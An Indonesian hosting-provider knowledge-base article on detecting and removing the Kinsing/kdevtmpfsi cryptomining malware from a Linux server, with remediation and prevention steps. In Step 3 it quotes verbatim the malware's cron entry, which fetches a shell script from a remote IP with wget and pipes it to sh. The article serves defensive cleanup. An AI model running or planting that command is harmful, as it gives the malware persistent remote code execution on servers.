A. Pendahuluan

Malware adalah perangkat lunak yang berjalan secara ilegal pada sistem dan menyebabkan dampak buruk terhadap kinerja server. 
Kinsing adalah malware berbasis bahasa Golang yang digunakan untuk menambang cryptocurrency dan menyebarkan dirinya ke host lain dalam jaringan korban, dan salah satu contoh nya adalah kdevtmps yang membuat CPU menjadi overload dan high pada proses suatu VM.

B. Ciri - Ciri  kdvtmpfsi 

Ciri-ciri Malware kdevtmpfsi, Ketika vps / server di cek dengan perintah TOP , ada proses mencurigakan seperti ini kdevtmpfsi atau /tmp/kdevtmpfsi

Proses tersebut mengartikan bahwa VPS sudah terinfeksi malware kdevtmpfsi yang membuat penggunaan CPU menjadi tinggi dampak nya VPS akan menjadi lag bahkan hang

C. Langkah - Langkah  

Berikut adalah langkah-langkah yang dapat ikuti:

Langkah 1: Pengecekan Detail Service Malware

Cek layanan yang berjalan dengan perintah berikut:

systemctl status 18447

Jika ditemukan proses malware seperti berikut:

├─ 2398 /tmp/kinsing
└─17398 /tmp/kdevtmpfsi

Maka malware berjalan melalui cron dan dieksekusi oleh user www-data.

Langkah 2: Pemblokiran IP yang Digunakan oleh Malware

Cari IP tujuan malware dengan:

lsof -p [PID]

Untuk mendapatkan PID:

top

Blokir IP dengan:

csf -d [IP]

Validasi pemblokiran:

ping [IP]

Jika berhasil, server akan menampilkan Destination Port Unreachable.

Langkah 3: Penghapusan Malware

Cek cronjob milik user www-data:

su -c "crontab -e" www-data -s /bin/bash

Jika ditemukan entri mencurigakan seperti:

* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

Komentari dengan # di awal baris:

# * * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

Restart cron:

systemctl restart cron

Langkah 4: Validasi Malware Tidak Berjalan Kembali

Cek apakah proses masih berjalan:

ps -aux | grep kdevtmpfsi
ps -aux | grep kinsing

Jika masih berjalan, hentikan dengan:

kill -9 [PID]

Pastikan tidak muncul kembali dengan:

top

Langkah 5: Penyebab dan Pencegahan

Salah satu penyebab utama adalah celah keamanan di PHP-FPM. Solusi permanen:

• Upgrade PHP ke versi terbaru (saat ini 7.4.16 atau lebih baru).
• Pastikan semua paket sistem diperbarui secara berkala.
• Gunakan firewall untuk membatasi akses yang tidak diperlukan.
• Backup data secara rutin untuk menghindari kerusakan lebih lanjut. 

D. Kesimpulan

Dengan mengikuti langkah-langkah di atas, Anda dapat mengidentifikasi, menghapus, dan mencegah infeksi malware kdevtmpfsi (Kinsing) di sistem Anda. Memastikan server selalu diperbarui, mengaktifkan firewall, serta rutin memantau aktivitas sistem dapat membantu menghindari ancaman serupa di masa depan.

Selamat! Anda sudah bisa Cara membersihkan malware kdevtmpsi Semoga artikel ini dapat membantu Anda. Temukan bantuan lainnya melalui Knowledge Base Biznet Gio. Jika Anda masih memiliki kendala silahkan hubungi support@biznetgio.com atau (021) 5714567.